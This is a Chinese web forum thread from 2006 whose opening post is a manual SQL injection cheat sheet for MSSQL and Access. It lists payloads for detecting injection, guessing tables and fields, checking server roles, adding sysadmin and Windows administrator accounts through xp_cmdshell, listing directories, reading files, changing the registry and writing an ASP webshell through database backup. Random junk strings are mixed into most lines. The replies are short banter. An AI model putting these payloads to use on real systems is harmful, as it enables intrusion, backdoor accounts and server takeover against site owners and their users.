社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3368阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 -/dEsgO  
  2.初步判断是否是mssql ;and user>0 o}'bv  
Ei3zBS?J)  
  3.注入参数是字符'and [查询条件] and ''=' ia{c  
NLe}Jqp  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' %=<IGce  
(9mMkU=  
  5.判断数据库系统 lE ;jCN  
gbStAr.  
  ;and (select count(*) from sysobjects)>0 mssql A +w v-~3  
o1OBwPj  
  ;and (select count(*) from msysobjects)>0 access Gy Qm/I  
~; OYtz  
25|8nfeC5  
cj|*_}  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 u%dKig  
$7Mtt.d6  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 w$5A|%Y+V}  
PS" .R_"  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 daAyx-  
TfZ6F8|B  
  9.(1)猜字段的ascii值(access) MZSxQ8  
JH]K/sC>  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 |m?vVLq  
2~p[7?sp'  
  (2)猜字段的ascii值(mssql) q 'a  
"?GebA  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 qG9+/u)\  
F{\gc|!i  
  10.测试权限结构(mssql) 0ZPV' `KGp  
0i8h I6d  
oXt,e   
>Dg#9  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- =`C4qC _  
,Ci/xnI  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- A?"h@-~2  
UU}7U]9u  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- E}Xka1 Bn  
N(3R|Ii  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- =vh8T\  
%YlTF\-  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- MY nH2w]  
VnJMmMM  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- "x&C5l}n  
2 vKx]w  
  ;and 1=(select IS_MEMBER('db_owner'));-- >1irSUj"~  
F[7x*-NO-  
bT!($?GNdg  
B7-RU<n  
  11.添加mssql和系统的帐户 9f}XRz  
)06iV  
  ;exec master.dbo.sp_addlogin username;-- 4*UP. r@  
  ;exec master.dbo.sp_password null,username,password;-- :PnSQjV:  
N\1/JW+  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- h:Ndzp{  
;<G<1+  
  ;exec master.dbo.xp_cmdshell 'net user username password ;+I4&VieK  
vV`|!5x  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- C;\VO)]t  
Y5!b)vke  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- |AH@ EI>  
re,.@${H  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- _NdLcpBT?  
vU/ D7  
FX,$_:f6Y  
_8h8Wtif  
  12.(1)遍历目录 C@HD(..#  
c 8QnN:n  
  ;create table dirs(paths varchar(100), id int) K{ }4zuZ  
5>ST"l_ca  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' GG'Sp53GE  
N^elVu4 K  
  ;and (select top 1 paths from dirs)>0 d\XRUO[  
i&@,5/'-_O  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ^ZQCIS-R  
LE c8NQs  
8gmn6dCf  
eZO9GMO  
  (2)遍历目录 %f[Ep 3D  
D?+ RJs  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- >4![&&  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ~%q7Vmk9  
|r~ uos  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 j+748QAhh  
bGh0<r7R  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 %7`d/dgR  
Wm6dQQ;Bj  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 iWXMKu  
^w6eWzI  
#cEq_[yI  
sdF3cX  
  13.mssql中的存储过程 ^[M~K5Y  
hrM"Zg  
  xp_regenumvalues 注册表根键, 子键 5(}H ?  
^)cM&Bx t%  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 l6B.6 '4)w  
Cals?u#U=  
  xp_regread 根键,子键,键值名 TJ2/?p\x  
iiwpSGFl]  
  ;exec xp_regread g+Ph6W  
h1%y:[_  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ?\yB)Nd y  
:2q ?>\  
  xp_regwrite 根键,子键, 值名, 值类型, 值 p\ txlT  
8)Tj H'  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 1e$[p[  
mvf _@2^  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 hrlCKL&  
O~Uw&Bq  
  xp_regdeletevalue 根键,子键,值名 VA]ZR+m  
@bQ!zCI  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 F|]rA*2u  
oBUh]sR{.  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 > I%zd/q?  
Rk[8Bd?  
iH _"W+dq  
*7vue"I*Z  
  14.mssql的backup创建webshell By/bVZks  
Pt3[|4L  
  use model $wXih#7  
fle0c^=  
  create table cmd(str image); S 1>Z6  
WRMz]|+}4  
  insert into cmd(str) values (''); WB"$u2{|i  
cJq<9(  
  backup database model to disk='c:\l.asp'; |\p5mh  
anitqy#E  
:+pPr Gj"  
bVmvjY4  
  15.mssql内置函数 (j`l5r#X#/  
ArdJ."  
  ;and (select @@version)>0 获得Windows的版本号 #8qyg<F  
?xHtn2(q  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa '?L%F{g/9  
?lG;,,jc,W  
  ;and (select user_name())>0 爆当前系统的连接用户 XkoWL  
9l=Fv6  
  ;and (select db_name())>0 得到当前连接的数据库 IgiqFV {  
/kb$p8!C".  
{ ;' :h  
^*zW"s  
  16.简洁的webshell B#H2RTc  
@>9A$w$H|a  
  use model "x.88,T6  
Lj-{t% }  
  create table cmd(str image); qSCTFJ0  
(HaU,vP  
  insert into cmd(str) values (''); $u- lo|  
1o)=GV1  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八